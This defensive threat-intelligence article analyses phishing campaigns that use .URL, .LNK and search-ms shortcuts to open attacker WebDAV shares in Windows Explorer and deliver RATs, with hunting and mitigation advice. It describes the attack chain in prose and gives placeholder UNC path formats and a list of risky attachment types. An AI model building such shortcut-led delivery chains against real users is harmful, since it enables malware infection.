WebDAV Delivery via Windows File Explorer: How .URL and .LNK Shortcuts Stage Malware Outside the Browser

Short title: Deep dive on Explorer-native WebDAV abuse for malware delivery
WebDAV, Windows File Explorer, WebClient, TryCloudflare, Cloudflare Tunnel, phishing, .URL, .LNK, search-ms, Mark-of-the-Web, SmartScreen, RAT delivery, detection engineering

Executive Summary

Cofense’s 25 February 2026 reporting details a growing tactic where threat actors abuse Windows File Explorer’s native ability to browse WebDAV resources to deliver malware without a traditional browser download workflow. (cofense.com)

In these campaigns, phishing emails routinely deliver (or link to) Windows Internet Shortcut files (.URL) and Windows Shortcut files (.LNK) that open a remote WebDAV share in Explorer and fetch additional scripts and payloads. Cofense notes it observed this tradecraft as early as February 2024, with campaign volume rising from September 2024 and remaining consistent since. (cofense.com)

Proofpoint independently described a closely aligned delivery chain in August 2024, where .URL files connect to external WebDAV shares to stage LNK/VBS, which then chain BAT/CMD and Python installers/scripts to deploy RAT payloads. (Proofpoint)

The defensive challenge is not just the delivery mechanism, but the user experience: Explorer presents remote content as a familiar folder view, while short-lived infrastructure is frequently fronted by legitimate services such as Cloudflare Tunnel demo subdomains on trycloudflare[.]com. (cofense.com)

Context and Timeline

From niche behaviour to repeatable commodity tradecraft

The “open a folder” deception sits at the intersection of several trends:

• Windows-native handlers as an initial access surface. Trellix documented adversary abuse of the search-ms protocol handler in July 2023, where victims are redirected to a remote server and Windows Explorer displays attacker-hosted results as if they were local search hits. (trellix.com)
• Cloud-based proxying and infrastructure churn. Proofpoint described increased abuse of TryCloudflare tunnels in 2024, emphasising that each tunnel generates a random subdomain and proxies traffic through Cloudflare’s network to the operator’s local server. (Proofpoint)
• WebDAV’s awkward place in Windows trust boundaries. Microsoft lists the WebClient (WebDAV) service as deprecated (November 2023) and notes it is not started by default, but the capability persists in many estates and remains accessible when enabled or triggered. (Microsoft Learn)

Observed activity milestones

• 26 July 2023: Trellix publishes “Beyond File Search”, describing search-ms abuse that can point Windows Explorer at WebDAV-style locations and present malicious shortcuts disguised as trusted icons. (trellix.com)
• February 2024: Cofense reports first observing WebDAV-in-Explorer delivery tradecraft in its dataset. (cofense.com)
• May to July 2024: Proofpoint reports increased campaign activity abusing TryCloudflare tunnels to stage WebDAV payload delivery chains. (Proofpoint)
• September 2024 onward: Cofense reports a sustained increase and continued baseline level of activity. (cofense.com)
• 25 February 2026: Cofense summarises the technique as a “constant threat”, with consistent patterns in lures, staging and final payloads. (cofense.com)

Why WebDAV-in-Explorer Works

Explorer is not “the internet” in most users’ mental model

Cofense’s central observation is that many users simply do not know Explorer can browse internet-hosted resources. That lack of awareness lets attackers reframe a download as routine file browsing, bypassing browser-centric security controls by bypassing the browser entirely. (cofense.com)

Once a user is inside a WebDAV-backed Explorer window, the interface is familiar: file icons, folders, double-click execution. Cofense notes the address bar may be the only clear indicator that the content is remote, showing an IP address or a domain name rather than a local path. (cofense.com)

WebDAV is legacy, but still usable (and therefore abusable)

Cofense describes WebDAV as a file management protocol over HTTP that was historically common for file transfers before modern cloud storage became dominant. Its advantage for attackers is that it “just works” over HTTP(S) and can be accessed by common tooling and Windows-native components. (cofense.com)

Microsoft’s deprecation of WebClient does not mean WebDAV disappears immediately; it means reduced investment and eventual removal, which can leave defenders with a long tail of environments where the functionality remains available but is poorly monitored. (Microsoft Learn)

Technical Breakdown: The Attack Chain

The WebDAV delivery pattern is best understood as a set of interchangeable building blocks. In practice, operators mix and match based on what their target environment will allow through email filtering, URL rewriting, endpoint controls and user training.

Step 1: Phishing delivers a “bridge” file or link

Most observed cases begin with a phishing message delivering either an attachment or a link that leads to an initial shortcut artefact, most commonly a .URL file. Proofpoint explicitly states that in most campaigns, the message contains a URL or attachment leading to an internet shortcut (.URL). (Proofpoint)

MITRE ATT&CK mapping:

• Phishing via attachment: T1566.001 (attack.mitre.org)
• Phishing via link: T1566.002 (attack.mitre.org)

Step 2: The shortcut opens WebDAV content inside Explorer

WebDAV addressing formats defenders should recognise

Cofense highlights two common ways WebDAV resources are referenced:

1. URL-style paths that resemble normal web links (conceptually like https://exampledomain/My_Files/) (cofense.com)
2. UNC-style paths where DavWWWRoot indicates the WebDAV root, for example:

• \\exampledomain\DavWWWRoot\My_Files (cofense.com)

Cofense also notes two important wrinkles in UNC usage:

• By default, UNC-style access uses HTTP over port 80.
• @SSL and explicit ports can force HTTPS, for example:
  • \\exampledomain@443\DavWWWRoot\My_Files
  • \\exampledomain@SSL\DavWWWRoot\My_Files (cofense.com)

These strings are useful hunting pivots, especially DavWWWRoot and @SSL, because they are uncommon in normal corporate workflows unless WebDAV is explicitly in use.

.URL files: small, trusted-looking, and highly abusable

Cofense provides examples where the .URL file’s URL field uses the file:// scheme to open a remote WebDAV folder in Explorer, rather than opening a web page in a browser. (cofense.com)

Cofense also notes .URL files can be crafted to open a specific remote file on a WebDAV server, including scripts, which is particularly useful for driving execution without obvious “download” behaviour. (cofense.com)

MITRE ATT&CK mapping: user execution is central here, because the chain relies on double-click behaviour and social engineering. T1204.002 (attack.mitre.org)

A subtle interaction signal: directory browsing can cause network traffic

One of the most operationally interesting points in the Cofense write-up is that .URL files written with UNC-style paths may trigger repeated DNS lookups and outbound connection attempts simply when Explorer browses a directory containing the shortcut. Cofense notes this behaviour can effectively “ping” attacker infrastructure and potentially signal victim interaction. (cofense.com)

For defenders, this suggests a valuable correlation opportunity: Explorer directory enumeration followed by DNS queries for unusual external domains can be a strong early-stage signal, even before payload execution.

Step 3: .LNK files and script hosts execute the next stage

Cofense notes .LNK shortcuts are particularly powerful because they can embed commands executed by a specified program, not just point to a file or folder. This lets attackers use LNKs to either open a WebDAV path in Explorer or directly invoke script execution from a remote WebDAV share. (cofense.com)

Cofense shows examples where LNKs invoke wscript.exe against a remote WebDAV-hosted script using a UNC path that includes @SSL and DavWWWRoot. (cofense.com)

Cofense further demonstrates a common pattern: the LNK invokes cmd.exe, downloads a script to %TEMP% using a built-in transfer utility, then executes it via Windows Script Host. (cofense.com)

MITRE ATT&CK mapping:

• Windows Command Shell: T1059.003 (attack.mitre.org)
• Visual Basic and WSH-style scripting (where used): T1059.005 (attack.mitre.org)
• Ingress Tool Transfer: T1105 (attack.mitre.org)

Step 4: Multi-stage payload delivery, commonly RAT-led

Cofense reports that since it first observed this tactic in February 2024, almost all associated reports ended in a RAT payload, and 87% delivered multiple RAT families, naming XWorm, AsyncRAT and DcRAT among the most common. (cofense.com)

Proofpoint similarly states the activity delivers exclusively RATs and provides a representative chain where .URL → WebDAV → LNK/VBS → BAT/CMD → Python installer/scripts → RAT. (Proofpoint)

This multi-payload approach matters operationally: it can create resilience against partial detection (one payload blocked, another succeeds) and increases the chance of establishing a foothold even if one stage fails.

The search-ms Pivot: WebDAV Without a WebDAV-Looking Link

Cofense’s analysis focuses on Explorer and WebDAV links, but Proofpoint and Trellix both highlight a closely related initial access surface: the Windows Search protocol handlers (search / search-ms).

What Trellix observed

Trellix describes a technique where malicious JavaScript on a web page triggers a search-ms query whose “crumb” parameter points to a remote server location using WebDAV-style UNC formatting including @SSL and DavWWWRoot. (trellix.com)

The key deception is visual: Trellix notes that remote malicious shortcut files can appear in Explorer search results “disguised as PDFs or other trusted icons”, creating an illusion that the files are local. (trellix.com)

Trellix also documents interaction mechanics defenders can hunt for at the network layer: after the user accepts an “Open Windows Explorer” prompt, the victim host may issue WebDAV-related HTTP methods such as OPTIONS and PROPFIND to enumerate and retrieve remote content. (trellix.com)

Finally, Trellix notes that if the technique is invoked from script files (Batch, PowerShell, Visual Basic, PHP, Office macro variants), the user may not see the same “Open Windows Explorer” alert, reducing friction and increasing the likelihood of follow-on execution. (trellix.com)

What Proofpoint adds

Proofpoint states that in some cases, file staging leverages the search-ms protocol handler to retrieve an LNK from a WebDAV share, and that benign PDFs are commonly displayed as decoys to appear legitimate. (Proofpoint)

Taken together, this suggests a broader pattern: attackers are not committed to “WebDAV links” as such. They are committed to getting Windows to render attacker-controlled remote content inside Explorer, where user trust is higher and conventional browser controls are less relevant.

Infrastructure: Why TryCloudflare Keeps Appearing

Cloudflare Tunnel “Quick Tunnels” align with attacker needs

Cofense reports that, as of its February 2026 publication date, all associated examples in its dataset used Cloudflare Tunnel demo accounts on trycloudflare[.]com to host WebDAV servers, and that instances were short-lived and often removed quickly after campaigns are detected. (cofense.com)

Cloudflare’s own documentation explains why this is attractive: TryCloudflare (Quick Tunnels) generates a random subdomain on trycloudflare.com and proxies requests through Cloudflare’s network back to a local web server running on the operator’s machine. (Cloudflare Docs)

Proofpoint reinforces the operational impact for defenders: randomised subdomains and proxying through a reputable service reduce the effectiveness of static blocklists and increase the burden on behavioural detection. (Proofpoint)

The trend persists beyond the 2024 window

Securonix’s June 2025 reporting on SERPENTINE#CLOUD describes a phishing chain using .lnk files to fetch remote payloads hosted on Cloudflare Tunnel subdomains, with multiple scripting stages (batch, VBScript, Python) leading to in-memory execution. (Securonix)

Even where WebDAV is not explicitly the delivery mechanism in every case, the repeatable theme is clear: ephemeral tunnels plus shortcut-led execution chains remain attractive to multiple criminal operators.

Trust Controls and the Mark-of-the-Web Problem

Even when WebDAV delivery does not rely on a specific vulnerability, it benefits from longstanding complexity in how Windows applies “internet origin” trust controls across different file acquisition paths.

MoTW is not consistently applied across WebDAV workflows

Trend Micro’s ZDI research into CVE-2024-38213 (Copy2Pwn) explicitly focuses on how files originating from WebDAV shares can end up locally without expected Mark-of-the-Web protections through copy-and-paste operations, and notes that Windows has historically treated WebDAV shares more like SMB shares than HTTP web servers. (www.trendmicro.com)

ZDI also notes it observed threat actors using the Windows search protocol to open WebDAV searches through Windows Explorer, which directly overlaps with the Trellix and Proofpoint observations around search-ms. (www.trendmicro.com)

Related exploited CVEs defenders should track (context, not the core technique)

These CVEs are relevant because they show sustained attacker interest in reducing SmartScreen and MoTW friction around shortcuts and downloaded content:

• CVE-2024-21412 (Internet Shortcut Files security feature bypass)
  NVD lists a CVSS v3.1 base score of 8.1 (High) and notes it is in CISA’s Known Exploited Vulnerabilities (KEV) catalogue. (nvd.nist.gov)
• CVE-2024-38213 (MoTW / SmartScreen security feature bypass)
  NVD lists a CVSS v3.1 base score of 6.5 (Medium) and indicates KEV inclusion (date added 13 August 2024). (nvd.nist.gov)
• CVE-2024-38217 (MoTW protection mechanism failure)
  NVD lists a CVSS v3.1 base score of 5.4 (Medium) and indicates KEV inclusion (date added 10 September 2024). (nvd.nist.gov)

The takeaway for defenders: WebDAV-in-Explorer delivery can be dangerous on its own, but it becomes materially worse when paired with MoTW and SmartScreen bypass conditions that reduce user-visible warnings or weaken post-download protections.

Detection and Hunting Guidance (No IOC List)

This section intentionally avoids enumerating campaign-specific indicators (especially trycloudflare subdomains) because they are high-churn by design and Cofense’s work is demo-led rather than IOC-led. Cofense itself emphasises behavioural detection and user awareness. (cofense.com)

1) Email security controls

Prioritise prevention of the “bridge” artefacts:

• High-risk attachment types: .url, .lnk, .vbs, .wsf, .wsh, .js, .hta, plus archive-wrapped variants. This aligns with both Cofense and Proofpoint’s descriptions of shortcut-first chains that then pivot into scripts. (cofense.com)
• HTML attachment risk: Proofpoint describes HTML attachments that contain search-ms queries pointing to LNK files. Trellix similarly describes HTML and PDF variants that trigger search-ms. (Proofpoint)

2) Endpoint telemetry: what “good” looks like, and what does not

Key behavioural pivots:

• Explorer spawning script hosts or shells is generally high-signal in office-user contexts, especially where the execution chain involves WSH and command shells (for example explorer.exe → wscript.exe or explorer.exe → cmd.exe). Cofense demonstrates LNK-driven execution via wscript.exe and shell utilities. (cofense.com)
• Shortcut execution followed by file staging to %TEMP% or Downloads: Proofpoint’s chains commonly involve helper scripts and staged Python installers/scripts. (Proofpoint)
• Unusual WebDAV access patterns: creation of WebDAV mapped connections, Explorer navigation to external domains, or sudden WebClient service activation where it is normally disabled.

3) Network telemetry: WebDAV methods and tunnel patterns

At the protocol layer, defenders should consider:

• WebDAV HTTP verbs such as OPTIONS and PROPFIND, which Trellix explicitly observed as part of search-ms-initiated remote enumeration before retrieving a malicious shortcut via GET. (trellix.com)
• trycloudflare[.]com baselining: Cloudflare documents that TryCloudflare generates random subdomains and proxies traffic through Cloudflare’s network to a localhost server. Proofpoint and Cofense both highlight that adversaries are abusing this behaviour. (Cloudflare Docs)

4) Response playbook highlights

When you suspect Explorer-WebDAV delivery:

1. Quarantine the initial artefacts: preserve the .url / .lnk and the container it arrived in (email, ZIP, HTML attachment).
2. Reconstruct the process tree from Explorer into script hosts and download utilities.
3. Identify staged payload locations (commonly user Downloads and %TEMP%, per Cofense and Proofpoint examples). (cofense.com)
4. Scope by behaviour, not just indicators: look for the same parent-child execution patterns and WebDAV enumeration sequences across endpoints.

MITRE ATT&CK Mapping (Observed Lifecycle)

Mitigation Recommendations

Reduce the exposed surface area

• Validate whether WebDAV is actually required. Microsoft lists WebClient (WebDAV) as deprecated and not started by default; if your business does not require WebDAV, keeping it disabled reduces the opportunity for Explorer-native WebDAV abuse. (Microsoft Learn)
• Constrain access to external file shares. Proofpoint recommends restricting access to external file sharing services to known, safelisted servers due to increased criminal use of WebDAV and SMB for staging. (Proofpoint)
• Treat TryCloudflare as a high-risk category. Cloudflare’s own docs describe randomised subdomains and proxying to localhost, which aligns closely with attacker needs for disposable infrastructure. (Cloudflare Docs)

Make user awareness more concrete than “don’t click links”

Cofense’s mitigation guidance is unusually practical: train users to treat Explorer’s address bar like a browser address bar, and distrust unfamiliar external domains that do not resemble local drives or known file shares. (cofense.com)

That guidance is valuable precisely because it targets the psychological trick this technique relies on.

Keep MoTW and SmartScreen defences current

Even if you do not see active exploitation of specific MoTW bypass CVEs in your environment today, NVD’s documentation of KEV inclusion for multiple related bypass issues reinforces that attackers actively pursue friction reduction around shortcut-delivered payloads. (nvd.nist.gov)

Consider protocol handler hardening (with care)

Trellix documents a direct mitigation for disabling search / search-ms handlers via registry deletion commands. This can be disruptive and should be tested, but it highlights that protocol handler governance is a real defensive lever for this class of attack. (trellix.com)

Historical Context and Related Research

• TryCloudflare and RAT delivery (2024): Proofpoint’s analysis remains a foundational reference for tunnel-driven staging chains. (Proofpoint)
• search-ms exploitation (2023): Trellix provides an early, detailed look at Explorer-rendered remote results and WebDAV enumeration behaviours. (trellix.com)
• WebDAV and MoTW edge cases (2024): ZDI’s Copy2Pwn research explicitly ties WebDAV acquisition paths to Mark-of-the-Web handling failures and notes threat actor use of Windows search protocols to access WebDAV shares through Explorer. (www.trendmicro.com)
• Ecosystem-level visibility: BleepingComputer’s coverage of TryCloudflare abuse helps contextualise how widely discussed and replicated the technique became once public reporting accelerated. (BleepingComputer)

GCVE context: the GCVE project publishes a directory and describes a broader effort to improve open vulnerability intelligence correlation, which may be useful for defenders building enrichment pipelines. (gcve.eu)

Future Outlook

Expect this tradecraft to persist and evolve along three predictable lines:

1. More handler-led delivery: As defenders harden against obvious attachments, attackers will continue pivoting to Windows-native protocol handlers and UI flows that feel “local” to users, as already seen with search-ms. (trellix.com)
2. Infrastructure churn as a default: Randomised, disposable tunnel subdomains will remain attractive for staging because they undermine static blocklisting and complicate rapid triage. (Cloudflare Docs)
3. Multi-stage, multi-payload chains: Cofense’s observation that 87% of its associated reports delivered multiple RAT families suggests operators increasingly optimise for resilience rather than elegance. (cofense.com)

Further Reading

• Cofense reporting on Explorer-WebDAV malware delivery (cofense.com)
• Proofpoint reporting on TryCloudflare tunnel abuse and WebDAV staging (Proofpoint)
• Trellix research on search-ms abuse and Explorer-rendered remote results (trellix.com)
• Cloudflare documentation on TryCloudflare Quick Tunnels (Cloudflare Docs)
• Trend Micro ZDI research on Copy2Pwn (CVE-2024-38213) and WebDAV MoTW implications (www.trendmicro.com)
• NVD entries documenting exploited MoTW and shortcut-related bypass CVEs (nvd.nist.gov)